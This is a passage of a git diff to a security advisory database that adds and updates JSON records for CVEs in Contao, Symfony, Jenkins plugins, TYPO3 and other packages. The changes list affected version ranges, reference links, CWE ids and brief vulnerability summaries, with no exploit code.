"introduced": "4.0.0" + }, + { + "fixed": "4.4.18" + } + ] + } + ] + }, { "package": { "ecosystem": "Packagist", @@ -25,10 +82,48 @@ "type": "ECOSYSTEM", "events": [ { - "introduced": "0" + "introduced": "4.5.0" }, { - "fixed": "4.5.7" + "fixed": "4.5.8" + } + ] + } + ] + }, + { + "package": { + "ecosystem": "Packagist", + "name": "contao/core" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "3.0.0" + }, + { + "fixed": "3.5.35" + } + ] + } + ] + }, + { + "package": { + "ecosystem": "Packagist", + "name": "contao/core-bundle" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "3.0.0" + }, + { + "fixed": "3.5.35" } ] } @@ -40,9 +135,29 @@ "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2018-10125" }, + { + "type": "WEB", + "url": "https://contao.org/en/news/contao-3_5_35.html" + }, + { + "type": "WEB", + "url": "https://contao.org/en/news/contao-4_4_18.html" + }, { "type": "WEB", "url": "https://contao.org/en/security-advisories/cross-site-scripting-in-the-system-log.html" + }, + { + "type": "WEB", + "url": "https://github.com/FriendsOfPHP/security-advisories/blob/master/contao/contao/CVE-2018-10125.yaml" + }, + { + "type": "WEB", + "url": "https://github.com/FriendsOfPHP/security-advisories/blob/master/contao/core-bundle/CVE-2018-10125.yaml" + }, + { + "type": "WEB", + "url": "https://github.com/FriendsOfPHP/security-advisories/blob/master/contao/core/CVE-2018-10125.yaml" } ], "database_specific": { diff --git a/advisories/github-reviewed/2022/02/GHSA-vvmr-8829-6whx/GHSA-vvmr-8829-6whx.json b/advisories/github-reviewed/2022/02/GHSA-vvmr-8829-6whx/GHSA-vvmr-8829-6whx.json index 534db57c10a79..ab29419e753ee 100644 --- a/advisories/github-reviewed/2022/02/GHSA-vvmr-8829-6whx/GHSA-vvmr-8829-6whx.json +++ b/advisories/github-reviewed/2022/02/GHSA-vvmr-8829-6whx/GHSA-vvmr-8829-6whx.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-vvmr-8829-6whx", - "modified": "2022-02-07T22:11:10Z", + "modified": "2024-02-06T17:08:59Z", "published": "2022-02-01T00:46:57Z", "aliases": [ "CVE-2022-23601" @@ -80,6 +80,72 @@ "versions": [ "6.0.3" ] + }, + { + "package": { + "ecosystem": "Packagist", + "name": "symfony/symfony" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "5.3.14" + }, + { + "fixed": "5.3.15" + } + ] + } + ], + "versions": [ + "5.3.14" + ] + }, + { + "package": { + "ecosystem": "Packagist", + "name": "symfony/symfony" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "5.4.3" + }, + { + "fixed": "5.4.4" + } + ] + } + ], + "versions": [ + "5.4.3" + ] + }, + { + "package": { + "ecosystem": "Packagist", + "name": "symfony/symfony" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "6.0.3" + }, + { + "fixed": "6.0.4" + } + ] + } + ], + "versions": [ + "6.0.3" + ] } ], "references": [ @@ -95,9 +161,21 @@ "type": "WEB", "url": "https://github.com/symfony/symfony/commit/f0ffb775febdf07e57117aabadac96fa37857f50" }, + { + "type": "WEB", + "url": "https://github.com/FriendsOfPHP/security-advisories/blob/master/symfony/framework-bundle/CVE-2022-23601.yaml" + }, + { + "type": "WEB", + "url": "https://github.com/FriendsOfPHP/security-advisories/blob/master/symfony/symfony/CVE-2022-23601.yaml" + }, { "type": "PACKAGE", "url": "https://github.com/symfony/symfony/" + }, + { + "type": "WEB", + "url": "https://symfony.com/cve-2022-23601" } ], "database_specific": { diff --git a/advisories/github-reviewed/2022/03/GHSA-2mgj-mwvf-mpg5/GHSA-2mgj-mwvf-mpg5.json b/advisories/github-reviewed/2022/03/GHSA-2mgj-mwvf-mpg5/GHSA-2mgj-mwvf-mpg5.json new file mode 100644 index 0000000000000..d9b7fbb0485ec --- /dev/null +++ b/advisories/github-reviewed/2022/03/GHSA-2mgj-mwvf-mpg5/GHSA-2mgj-mwvf-mpg5.json @@ -0,0 +1,64 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-2mgj-mwvf-mpg5", + "modified": "2024-01-30T22:05:12Z", + "published": "2022-03-30T00:00:24Z", + "aliases": [ + "CVE-2022-28144" + ], + "summary": "Missing permission checks in Jenkins Proxmox Plugin ", + "details": "Jenkins Proxmox Plugin 0.7.0 and earlier does not perform a permission check in several HTTP endpoints, allowing attackers with Overall/Read permission to connect to an attacker-specified host using attacker-specified username and password (perform a connection test), disable SSL/TLS validation for the entire Jenkins controller JVM as part of the connection test (see CVE-2022-28142), and test a rollback with attacker-specified parameters.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N" + } + ], + "affected": [ + { + "package": { + "ecosystem": "Maven", + "name": "org.jenkins-ci.plugins:proxmox" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "fixed": "0.7.1" + } + ] + } + ], + "database_specific": { + "last_known_affected_version_range": "<= 0.7.0" + } + } + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2022-28144" + }, + { + "type": "WEB", + "url": "https://www.jenkins.io/security/advisory/2022-03-29/#SECURITY-2082" + }, + { + "type": "WEB", + "url": "http://www.openwall.com/lists/oss-security/2022/03/29/1" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-862" + ], + "severity": "MODERATE", + "github_reviewed": true, + "github_reviewed_at": "2024-01-30T22:05:12Z", + "nvd_published_at": "2022-03-29T13:15:00Z" + } +} \ No newline at end of file diff --git a/advisories/github-reviewed/2022/03/GHSA-75p7-527p-w8wp/GHSA-75p7-527p-w8wp.json b/advisories/github-reviewed/2022/03/GHSA-75p7-527p-w8wp/GHSA-75p7-527p-w8wp.json index 029f51f5df739..8e9711d4e763e 100644 --- a/advisories/github-reviewed/2022/03/GHSA-75p7-527p-w8wp/GHSA-75p7-527p-w8wp.json +++ b/advisories/github-reviewed/2022/03/GHSA-75p7-527p-w8wp/GHSA-75p7-527p-w8wp.json @@ -60,6 +60,10 @@ "type": "WEB", "url": "https://github.com/Rudloff/alltube/commit/bc14b6e45c766c05757fb607ef8d444cbbfba71a" }, + { + "type": "WEB", + "url": "https://github.com/FriendsOfPHP/security-advisories/blob/master/rudloff/alltube/CVE-2022-24739.yaml" + }, { "type": "PACKAGE", "url": "https://github.com/Rudloff/alltube" diff --git a/advisories/github-reviewed/2022/03/GHSA-7mv4-4xpg-xq44/GHSA-7mv4-4xpg-xq44.json b/advisories/github-reviewed/2022/03/GHSA-7mv4-4xpg-xq44/GHSA-7mv4-4xpg-xq44.json index 1cb7826973192..ae441a687785f 100644 --- a/advisories/github-reviewed/2022/03/GHSA-7mv4-4xpg-xq44/GHSA-7mv4-4xpg-xq44.json +++ b/advisories/github-reviewed/2022/03/GHSA-7mv4-4xpg-xq44/GHSA-7mv4-4xpg-xq44.json @@ -40,6 +40,14 @@ "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2020-26138" }, + { + "type": "WEB", + "url": "https://github.com/FriendsOfPHP/security-advisories/blob/master/silverstripe/framework/CVE-2020-26138.yaml" + }, + { + "type": "WEB", + "url": "https://www.silverstripe.org/download/security-releases/cve-2020-26138" + }, { "type": "WEB", "url": "https://www.silverstripe.org/download/security-releases/cve-2020-26138/" diff --git a/advisories/github-reviewed/2022/03/GHSA-crp2-qrr5-8pq7/GHSA-crp2-qrr5-8pq7.json b/advisories/github-reviewed/2022/03/GHSA-crp2-qrr5-8pq7/GHSA-crp2-qrr5-8pq7.json index 80a25eae1d728..ea0a096fa8afd 100644 --- a/advisories/github-reviewed/2022/03/GHSA-crp2-qrr5-8pq7/GHSA-crp2-qrr5-8pq7.json +++ b/advisories/github-reviewed/2022/03/GHSA-crp2-qrr5-8pq7/GHSA-crp2-qrr5-8pq7.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-crp2-qrr5-8pq7", - "modified": "2022-03-29T19:11:08Z", + "modified": "2024-01-31T15:32:06Z", "published": "2022-03-02T21:33:17Z", "aliases": [ "CVE-2022-23648" @@ -102,6 +102,18 @@ "type": "WEB", "url": "https://github.com/containerd/containerd/releases/tag/v1.6.1" }, + { + "type": "WEB", + "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/AUDQUQBZJGBWJPMRVB6QCCCRF7O3O4PA/" + }, + { + "type": "WEB", + "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/HFTS2EF3S7HNYSNZSEJZIJHPRU7OPUV3/" + }, + { + "type": "WEB", + "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/OCCARJ6FU4MWBTXHZNMS7NELPDBIX2VO/" + }, { "type": "WEB", "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/AUDQUQBZJGBWJPMRVB6QCCCRF7O3O4PA/" @@ -114,6 +126,10 @@ "type": "WEB", "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/OCCARJ6FU4MWBTXHZNMS7NELPDBIX2VO/" }, + { + "type": "WEB", + "url": "https://security.gentoo.org/glsa/202401-31" + }, { "type": "WEB", "url": "https://www.debian.org/security/2022/dsa-5091" diff --git a/advisories/github-reviewed/2022/03/GHSA-m9gv-4523-jffm/GHSA-m9gv-4523-jffm.json b/advisories/github-reviewed/2022/03/GHSA-m9gv-4523-jffm/GHSA-m9gv-4523-jffm.json new file mode 100644 index 0000000000000..eff68ac7e4beb --- /dev/null +++ b/advisories/github-reviewed/2022/03/GHSA-m9gv-4523-jffm/GHSA-m9gv-4523-jffm.json @@ -0,0 +1,65 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-m9gv-4523-jffm", + "modified": "2024-01-30T21:07:16Z", + "published": "2022-03-16T00:00:44Z", + "aliases": [ + "CVE-2022-27199" + ], + "summary": "Missing permission checks in AWS Credentials Plugin ", + "details": "A missing permission check in Jenkins CloudBees AWS Credentials Plugin 189.v3551d5642995 and earlier allows attackers with Overall/Read permission to connect to an AWS service using an attacker-specified token.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N" + } + ], + "affected": [ + { + "package": { + "ecosystem": "Maven", + "name": "org.jenkins-ci.plugins:aws-credentials" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "fixed": "191.vcb_f183ce58b_9" + } + ] + } + ], + "database_specific": { + "last_known_affected_version_range": "<= 189.v3551d5642995" + } + } + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2022-27199" + }, + { + "type": "WEB", + "url": "https://www.jenkins.io/security/advisory/2022-03-15/#SECURITY-2351" + }, + { + "type": "WEB", + "url": "http://www.openwall.com/lists/oss-security/2022/03/15/2" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-276", + "CWE-862" + ], + "severity": "MODERATE", + "github_reviewed": true, + "github_reviewed_at": "2024-01-30T21:07:16Z", + "nvd_published_at": "2022-03-15T17:15:00Z" + } +} \ No newline at end of file diff --git a/advisories/github-reviewed/2022/03/GHSA-q7rv-6hp3-vh96/GHSA-q7rv-6hp3-vh96.json b/advisories/github-reviewed/2022/03/GHSA-q7rv-6hp3-vh96/GHSA-q7rv-6hp3-vh96.json index 7d932960f9e66..f496a81980723 100644 --- a/advisories/github-reviewed/2022/03/GHSA-q7rv-6hp3-vh96/GHSA-q7rv-6hp3-vh96.json +++ b/advisories/github-reviewed/2022/03/GHSA-q7rv-6hp3-vh96/GHSA-q7rv-6hp3-vh96.json @@ -71,6 +71,10 @@ "type": "WEB", "url": "https://github.com/guzzle/psr7/pull/486/commits/9a96d9db668b485361ed9de7b5bf1e54895df1dc" }, + { + "type": "WEB", + "url": "https://github.com/FriendsOfPHP/security-advisories/blob/master/guzzlehttp/psr7/CVE-2022-24775.yaml" + }, { "type": "PACKAGE", "url": "https://github.com/guzzle/psr7" diff --git a/advisories/github-reviewed/2022/03/GHSA-q8hg-pf8v-cxrv/GHSA-q8hg-pf8v-cxrv.json b/advisories/github-reviewed/2022/03/GHSA-q8hg-pf8v-cxrv/GHSA-q8hg-pf8v-cxrv.json index 92b61d94f077f..5c81542b24a84 100644 --- a/advisories/github-reviewed/2022/03/GHSA-q8hg-pf8v-cxrv/GHSA-q8hg-pf8v-cxrv.json +++ b/advisories/github-reviewed/2022/03/GHSA-q8hg-pf8v-cxrv/GHSA-q8hg-pf8v-cxrv.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-q8hg-pf8v-cxrv", - "modified": "2023-09-21T20:05:33Z", + "modified": "2024-02-01T15:49:08Z", "published": "2022-03-26T00:22:49Z", "aliases": [ "CVE-2019-18887" @@ -185,6 +185,18 @@ "type": "WEB", "url": "https://github.com/symfony/symfony/releases/tag/v4.3.8" }, + { + "type": "WEB", + "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/DZNXRVHDQBNZQUCNRVZICPPBFRAUWUJX/" + }, + { + "type": "WEB", + "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/UED22BOXTL2SSFMGYKA64ZFHGLLJG3EA/" + }, + { + "type": "WEB", + "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/VXEAOEANNIVYANTMOJ42NKSU6BGNBULZ/" + }, { "type": "WEB", "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/DZNXRVHDQBNZQUCNRVZICPPBFRAUWUJX/" @@ -217,6 +229,6 @@ "severity": "HIGH", "github_reviewed": true, "github_reviewed_at": "2022-03-26T00:22:49Z", - "nvd_published_at": null + "nvd_published_at": "2019-11-21T23:15:13Z" } } \ No newline at end of file diff --git a/advisories/github-reviewed/2022/03/GHSA-r5hc-wm3g-hjw6/GHSA-r5hc-wm3g-hjw6.json b/advisories/github-reviewed/2022/03/GHSA-r5hc-wm3g-hjw6/GHSA-r5hc-wm3g-hjw6.json index 33555293c1321..f32805492acd8 100644 --- a/advisories/github-reviewed/2022/03/GHSA-r5hc-wm3g-hjw6/GHSA-r5hc-wm3g-hjw6.json +++ b/advisories/github-reviewed/2022/03/GHSA-r5hc-wm3g-hjw6/GHSA-r5hc-wm3g-hjw6.json @@ -52,6 +52,10 @@ "type": "WEB", "url": "https://github.com/rudloff/alltube/commit/148a171b240e7ceb076b9e198bef412de14ac55d" }, + { + "type": "WEB", + "url": "https://github.com/FriendsOfPHP/security-advisories/blob/master/rudloff/alltube/CVE-2022-0768.yaml" + }, { "type": "PACKAGE", "url": "https://github.com/Rudloff/alltube/" diff --git a/advisories/github-reviewed/2022/03/GHSA-r7c9-c69m-rph8/GHSA-r7c9-c69m-rph8.json b/advisories/github-reviewed/2022/03/GHSA-r7c9-c69m-rph8/GHSA-r7c9-c69m-rph8.json index 07807aee9951e..0dc11ae4bb89f 100644 --- a/advisories/github-reviewed/2022/03/GHSA-r7c9-c69m-rph8/GHSA-r7c9-c69m-rph8.json +++ b/advisories/github-reviewed/2022/03/GHSA-r7c9-c69m-rph8/GHSA-r7c9-c69m-rph8.json @@ -44,7 +44,7 @@ "type": "ECOSYSTEM", "events": [ { - "introduced": "5.0.0" + "introduced": "5.0.10" }, { "fixed": "5.6.3" @@ -75,6 +75,10 @@ "type": "WEB", "url": "https://github.com/sebastianbergmann/phpunit/commit/3aaddb1c5bd9b9b8d070b4cf120e71c36fd08412" }, + { + "type": "WEB", + "url": "https://github.com/FriendsOfPHP/security-advisories/blob/master/phpunit/phpunit/CVE-2017-9841.yaml" + }, { "type": "PACKAGE", "url": "https://github.com/sebastianbergmann/phpunit" diff --git a/advisories/github-reviewed/2022/03/GHSA-wjvr-2hjg-6rhj/GHSA-wjvr-2hjg-6rhj.json b/advisories/github-reviewed/2022/03/GHSA-wjvr-2hjg-6rhj/GHSA-wjvr-2hjg-6rhj.json new file mode 100644 index 0000000000000..dcd52d4642b0f --- /dev/null +++ b/advisories/github-reviewed/2022/03/GHSA-wjvr-2hjg-6rhj/GHSA-wjvr-2hjg-6rhj.json @@ -0,0 +1,64 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-wjvr-2hjg-6rhj", + "modified": "2024-01-30T21:07:34Z", + "published": "2022-03-30T00:00:24Z", + "aliases": [ + "CVE-2022-28143" + ], + "summary": "CSRF vulnerability in Proxmox Plugin ", + "details": "A cross-site request forgery (CSRF) vulnerability in Jenkins Proxmox Plugin 0.7.0 and earlier allows attackers to connect to an attacker-specified host using attacker-specified username and password (perform a connection test), disable SSL/TLS validation for the entire Jenkins controller JVM as part of the connection test (see CVE-2022-28142), and test a rollback with attacker-specified parameters.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N" + } + ], + "affected": [ + { + "package": { + "ecosystem": "Maven", + "name": "org.jenkins-ci.plugins:proxmox" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "fixed": "0.7.1" + } + ] + } + ], + "database_specific": { + "last_known_affected_version_range": "<= 0.7.0" + } + } + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2022-28143" + }, + { + "type": "WEB", + "url": "https://www.jenkins.io/security/advisory/2022-03-29/#SECURITY-2082" + }, + { + "type": "WEB", + "url": "http://www.openwall.com/lists/oss-security/2022/03/29/1" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-352" + ], + "severity": "MODERATE", + "github_reviewed": true, + "github_reviewed_at": "2024-01-30T21:07:34Z", + "nvd_published_at": "2022-03-29T13:15:00Z" + } +} \ No newline at end of file diff --git a/advisories/github-reviewed/2022/04/GHSA-3276-p9f2-8q89/GHSA-3276-p9f2-8q89.json b/advisories/github-reviewed/2022/04/GHSA-3276-p9f2-8q89/GHSA-3276-p9f2-8q89.json new file mode 100644 index 0000000000000..3a2fc951c01e7 --- /dev/null +++ b/advisories/github-reviewed/2022/04/GHSA-3276-p9f2-8q89/GHSA-3276-p9f2-8q89.json @@ -0,0 +1,96 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-3276-p9f2-8q89", + "modified": "2024-02-07T21:31:25Z", + "published": "2022-04-21T01:57:47Z", + "aliases": [ + "CVE-2010-3670" + ], + "summary": "TYPO3 is vulnerable to insecure randomness during hash generation in forgot password function", + "details": "TYPO3 before 4.3.4 and 4.4.x before 4.4.1 contains insecure randomness during generation of a hash with the \"forgot password\" function.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:N" + } + ], + "affected": [ + { + "package": { + "ecosystem": "Packagist", + "name": "typo3/cms-frontend" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "fixed": "4.3.4" + } + ] + } + ] + }, + { + "package": { + "ecosystem": "Packagist", + "name": "typo3/cms-frontend" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "4.4.0" + }, + { + "fixed": "4.4.1" + } + ] + } + ] + } + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2010-3670" + }, + { + "type": "WEB", + "url": "https://github.com/TYPO3/typo3/commit/09ab77653161f23e266470a5984d4d5e64588355" + }, + { + "type": "WEB", + "url": "https://github.com/TYPO3/typo3/commit/c03e944d200bf427bb18cad15f2ad36bc83061c9" + }, + { + "type": "WEB", + "url": "https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=590719" + }, + { + "type": "PACKAGE", + "url": "https://github.com/TYPO3-CMS/frontend" + }, + { + "type": "WEB", + "url": "https://security-tracker.debian.org/tracker/CVE-2010-3670" + }, + { + "type": "WEB", + "url": "https://typo3.org/security/advisory/typo3-sa-2010-012/#Insecure_Randomness" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-326" + ], + "severity": "MODERATE", + "github_reviewed": true, + "github_reviewed_at": "2024-02-07T21:31:25Z", + "nvd_published_at": "2019-11-05T20:15:00Z" + } +} \ No newline at end of file diff --git a/advisories/github-reviewed/2022/04/GHSA-48ww-8h7g-4hwq/GHSA-48ww-8h7g-4hwq.json b/advisories/github-reviewed/2022/04/GHSA-48ww-8h7g-4hwq/GHSA-48ww-8h7g-4hwq.json new file mode 100644 index 0000000000000..f490b5e51d650 --- /dev/null +++ b/advisories/github-reviewed/2022/04/GHSA-48ww-8h7g-4hwq/GHSA-48ww-8h7g-4hwq.json @@ -0,0 +1,142 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-48ww-8h7g-4hwq", + "modified": "2024-02-06T23:33:25Z", + "published": "2022-04-21T01:57:47Z", + "aliases": [ + "CVE-2010-3667" + ], + "summary": "TYPO3 is vulnerable to Spam Abuse in the native form content element", + "details": "TYPO3 before 4.1.14, 4.2.x before 4.2.13, 4.3.x before 4.3.4 and 4.4.x before 4.4.1 allows Spam Abuse in the native form content element. An attacker could abuse the form to send mails to arbitrary email addresses.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N" + } + ], + "affected": [ + { + "package": { + "ecosystem": "Packagist", + "name": "typo3/cms-frontend" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "fixed": "4.1.14" + } + ] + } + ] + }, + { + "package": { + "ecosystem": "Packagist", + "name": "typo3/cms-frontend" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "4.2.0" + }, + { + "fixed": "4.2.13" + } + ] + } + ] + }, + { + "package": { + "ecosystem": "Packagist", + "name": "typo3/cms-frontend" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "4.3.0" + }, + { + "fixed": "4.3.4" + } + ] + } + ] + }, + { + "package": { + "ecosystem": "Packagist", + "name": "typo3/cms-frontend" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "4.4.0" + }, + { + "fixed": "4.4.1" + } + ] + } + ] + } + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2010-3667" + }, + { + "type": "WEB", + "url": "https://github.com/TYPO3/typo3/commit/34da374183dd472fa7987ee25b47544a06bd2173" + }, + { + "type": "WEB", + "url": "https://github.com/TYPO3/typo3/commit/5eb60976cea268b879e02811208e6a1777674cbb" + }, + { + "type": "WEB", + "url": "https://github.com/TYPO3/typo3/commit/78dbe326df7ebc612f40882920a426c82b2ca9d3" + }, + { + "type": "WEB", + "url": "https://github.com/TYPO3/typo3/commit/f82696c7d62842edb0bf79ef21a85d56735a1527" + }, + { + "type": "WEB", + "url": "https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=590719" + }, + { + "type": "PACKAGE", + "url": "https://github.com/TYPO3-CMS/frontend" + }, + { + "type": "WEB", + "url": "https://security-tracker.debian.org/tracker/CVE-2010-3667" + }, + { + "type": "WEB", + "url": "https://typo3.org/security/advisory/typo3-sa-2010-012/#Spam_Abuse" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-20" + ], + "severity": "MODERATE", + "github_reviewed": true, + "github_reviewed_at": "2024-02-06T23:33:25Z", + "nvd_published_at": "2019-11-04T22:15:00Z" + } +} \ No newline at end of file diff --git a/advisories/github-reviewed/2022/04/GHSA-4rvc-5hrh-qmwf/GHSA-4rvc-5hrh-qmwf.json b/advisories/github-reviewed/2022/04/GHSA-4rvc-5hrh-qmwf/GHSA-4rvc-5hrh-qmwf.json new file mode 100644 index 0000000000000..90a3de786d5f2 --- /dev/null +++ b/advisories/github-reviewed/2022/04/GHSA-4rvc-5hrh-qmwf/GHSA-4rvc-5hrh-qmwf.json @@ -0,0 +1,126 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-4rvc-5hrh-qmwf", + "modified": "2024-02-07T22:32:53Z", + "published": "2022-04-21T01:57:46Z", + "aliases": [ + "CVE-2010-3662" + ], + "summary": "TYPO3 SQL injection vulnerability on the backend", + "details": "TYPO3 before 4.1.14, 4.2.x before 4.2.13, 4.3.x before 4.3.4 and 4.4.x before 4.4.1 allows SQL Injection on the backend.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" + } + ], + "affected": [ + { + "package": { + "ecosystem": "Packagist", + "name": "typo3/cms-backend" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "fixed": "4.1.14" + } + ] + } + ] + }, + { + "package": { + "ecosystem": "Packagist", + "name": "typo3/cms-backend" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "4.2.0" + }, + { + "fixed": "4.2.13" + } + ] + } + ] + }, + { + "package": { + "ecosystem": "Packagist", + "name": "typo3/cms-backend" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "4.3.0" + }, + { + "fixed": "4.3.4" + } + ] + } + ] + }, + { + "package": { + "ecosystem": "Packagist", + "name": "typo3/cms-backend" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "4.4.0" + }, + { + "fixed": "4.4.1" + } + ] + } + ] + } + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2010-3662" + }, + { + "type": "WEB", + "url": "https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=590719" + }, + { + "type": "PACKAGE", + "url": "https://github.com/TYPO3-CMS/backend" + }, + { + "type": "WEB", + "url": "https://security-tracker.debian.org/tracker/CVE-2010-3662" + }, + { + "type": "WEB", + "url": "https://typo3.org/security/advisory/typo3-sa-2010-012/#SQL_Injection" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-89" + ], + "severity": "HIGH", + "github_reviewed": true, + "github_reviewed_at": "2024-02-07T22:32:53Z", + "nvd_published_at": "2019-11-04T22:15:00Z" + } +} \ No newline at end of file diff --git a/advisories/github-reviewed/2022/04/GHSA-8xp9-99h5-4vcg/GHSA-8xp9-99h5-4vcg.json b/advisories/github-reviewed/2022/04/GHSA-8xp9-99h5-4vcg/GHSA-8xp9-99h5-4vcg.json new file mode 100644 index 0000000000000..64788fb9abbd9 --- /dev/null +++ b/advisories/github-reviewed/2022/04/GHSA-8xp9-99h5-4vcg/GHSA-8xp9-99h5-4vcg.json @@ -0,0 +1,126 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-8xp9-99h5-4vcg", + "modified": "2024-02-06T23:22:30Z", + "published": "2022-04-21T01:57:47Z", + "aliases": [ + "CVE-2010-3664" + ], + "summary": "TYPO3 is vulnerable to Information Disclosure on the backend", + "details": "TYPO3 before 4.1.14, 4.2.x before 4.2.13, 4.3.x before 4.3.4 and 4.4.x before 4.4.1 allows Information Disclosure on the backend.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N" + } + ], + "affected": [ + { + "package": { + "ecosystem": "Packagist", + "name": "typo3/cms-backend" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "fixed": "4.1.14" + } + ] + } + ] + }, + { + "package": { + "ecosystem": "Packagist", + "name": "typo3/cms-backend" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "4.2.0" + }, + { + "fixed": "4.2.13" + } + ] + } + ] + }, + { + "package": { + "ecosystem": "Packagist", + "name": "typo3/cms-backend" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "4.3.0" + }, + { + "fixed": "4.3.4" + } + ] + } + ] + }, + { + "package": { + "ecosystem": "Packagist", + "name": "typo3/cms-backend" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "4.4.0" + }, + { + "fixed": "4.4.1" + } + ] + } + ] + } + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2010-3664" + }, + { + "type": "WEB", + "url": "https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=590719" + }, + { + "type": "PACKAGE", + "url": "https://github.com/TYPO3-CMS/backend" + }, + { + "type": "WEB", + "url": "https://security-tracker.debian.org/tracker/CVE-2010-3664" + }, + { + "type": "WEB", + "url": "https://typo3.org/security/advisory/typo3-sa-2010-012/#Information_Disclosure" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-200" + ], + "severity": "MODERATE", + "github_reviewed": true, + "github_reviewed_at": "2024-02-06T23:22:30Z", + "nvd_published_at": "2019-11-04T22:15:00Z" + } +} \ No newline at end of file diff --git a/advisories/github-reviewed/2022/04/GHSA-c7xr-736p-29j3/GHSA-c7xr-736p-29j3.json b/advisories/github-reviewed/2022/04/GHSA-c7xr-736p-29j3/GHSA-c7xr-736p-29j3.json new file mode 100644 index 0000000000000..521aa5ef7b72d --- /dev/null +++ b/advisories/github-reviewed/2022/04/GHSA-c7xr-736p-29j3/GHSA-c7xr-736p-29j3.json @@ -0,0 +1,142 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-c7xr-736p-29j3", + "modified": "2024-02-06T23:21:45Z", + "published": 